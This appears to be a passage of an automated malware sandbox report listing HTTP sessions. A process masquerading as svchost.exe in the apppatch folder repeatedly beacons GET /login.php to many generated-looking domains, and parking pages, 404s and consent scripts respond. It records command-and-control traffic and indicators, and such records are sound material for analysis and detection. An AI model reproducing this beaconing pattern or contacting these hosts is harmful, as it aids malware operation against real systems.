                                                                                                                                                                                                              Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDdkM2ZiMGEtMGYzOS00MTg5LThhOGMtZmEwMGI3NWRiODczIiwicGFnZV90aW1lIjoxNzMxMzQ2NTAyLCJwYWdlX3VybCI6I


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              59192.168.2.85772844.221.84.105807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.574464083 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qetyfuv.com
                                                                                                                                                                                                              Cookie: btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.002321959 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:02 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346502|1731346389|56|2|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              60192.168.2.857729208.100.26.24580
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.599909067 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.045061111 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:02 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              61192.168.2.85773075.2.71.199807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.604688883 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              62192.168.2.8577313.94.10.34807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.673456907 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lymyxid.com
                                                                                                                                                                                                              Cookie: btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0; snkz=66.23.206.109
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.030884027 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:02 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346502|1731346388|57|2|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              63192.168.2.85773344.221.84.105807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.712440014 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vocyzit.com
                                                                                                                                                                                                              Cookie: btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.164091110 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:03 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346503|1731346389|57|2|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              64192.168.2.85773218.208.156.24880
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.712507010 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vonypom.com
                                                                                                                                                                                                              Cookie: btst=e8a049cc40d6b9d00effb9629f14927b|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.161793947 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:03 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=e8a049cc40d6b9d00effb9629f14927b|66.23.206.109|1731346503|1731346389|57|2|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              65192.168.2.857734199.191.50.83807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.758084059 CET281OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: galyqaz.com
                                                                                                                                                                                                              Cookie: vsid=903vr478891988923922560
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146245003 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:03 GMT
                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Data Raw: 61 39 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: a9de<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146270990 CET212INData Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f
                                                                                                                                                                                                              Data Ascii: f(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146281958 CET1236INData Raw: 3d 22 61 2e 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 6e 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 6e 3d 22 63 64 6e 2e 63 6f
                                                                                                                                                                                                              Data Ascii: ="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=funct
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146440029 CET1236INData Raw: 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 21 3d 2d 31 29 7b 63 2e 70 75 73 68 28 65 2e 73 75 62 73 74 72 28 65 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 2b 38 2c 32 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29
                                                                                                                                                                                                              Data Ascii: .indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase())}else{if("cmp_setlang" in window&&window.cmp_setlang!=""){c.push(window.cmp_setlang.toUpperCase())}else{if(a.length>0){for(var d=0;d<a.length;d++){c.push(a[d])}
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146451950 CET1236INData Raw: 78 4f 66 28 22 26 22 29 21 3d 2d 31 29 7b 77 3d 77 2e 73 75 62 73 74 72 28 30 2c 77 2e 69 6e 64 65 78 4f 66 28 22 26 22 29 29 7d 72 65 74 75 72 6e 20 77 7d 76 61 72 20 6b 3d 28 22 63 6d 70 5f 70 72 6f 74 6f 22 20 69 6e 20 68 29 3f 68 2e 63 6d 70
                                                                                                                                                                                                              Data Ascii: xOf("&")!=-1){w=w.substr(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:"){k="https:"}var g=("cmp_ref" in h)?h.cmp_ref:location.href;var j=u.createElement("script");j.setAttribute("data-cmp-ab
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146465063 CET636INData Raw: 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73 63 72 69 70 74 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 5b 30 5d 2e 61 70 70
                                                                                                                                                                                                              Data Ascii: }if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}var m="js";var p=x("cmpdebugunminimized","cmpdebugunminimized" in h?h.cmpdebugunminimized:0)>0?"":".min";var a=x("cmpdebugcoverage","cmp_debugcover
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146855116 CET1236INData Raw: 3d 30 29 7b 74 3d 76 28 22 64 69 76 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73 70 61 6e 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 69 6e 73 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d
                                                                                                                                                                                                              Data Ascii: =0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}})();window.cmp_addFrame=function(b){if(!window.frames[b]){if(document.body){v
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146864891 CET212INData Raw: 73 3a 22 73 74 75 62 22 2c 64 69 73 70 6c 61 79 53 74 61 74 75 73 3a 22 68 69 64 64 65 6e 22 2c 61 70 69 56 65 72 73 69 6f 6e 3a 22 32 2e 32 22 2c 63 6d 70 49 64 3a 33 31 7d 2c 74 72 75 65 29 7d 65 6c 73 65 7b 61 5b 32 5d 28 66 61 6c 73 65 2c 74
                                                                                                                                                                                                              Data Ascii: s:"stub",displayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{a[2](false,true)}}else{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146876097 CET1236INData Raw: 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 7c 7c 61 5b 30 5d 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f
                                                                                                                                                                                                              Data Ascii: slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){retur
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146888971 CET1236INData Raw: 3d 22 68 61 73 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 46 69 65 6c 64 22 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 65 6c 73 65 7b 5f 5f 67 70 70 2e 71 2e 70 75 73 68 28 5b 5d 2e
                                                                                                                                                                                                              Data Ascii: ="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.151741982 CET1236INData Raw: 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 28 61 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                              Data Ascii: };window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;windo


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              66192.168.2.85773575.2.71.199807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.059156895 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              67192.168.2.857736208.100.26.245807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.112601042 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyvyxor.com
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.560759068 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:03 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              68192.168.2.85773791.195.240.19807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.143022060 CET271OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: www.gahyqah.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.771915913 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:35:03 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                              last-modified: Mon, 11 Nov 2024 17:35:03 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-7596689c44-ptvfg
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Raw: 38 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED]
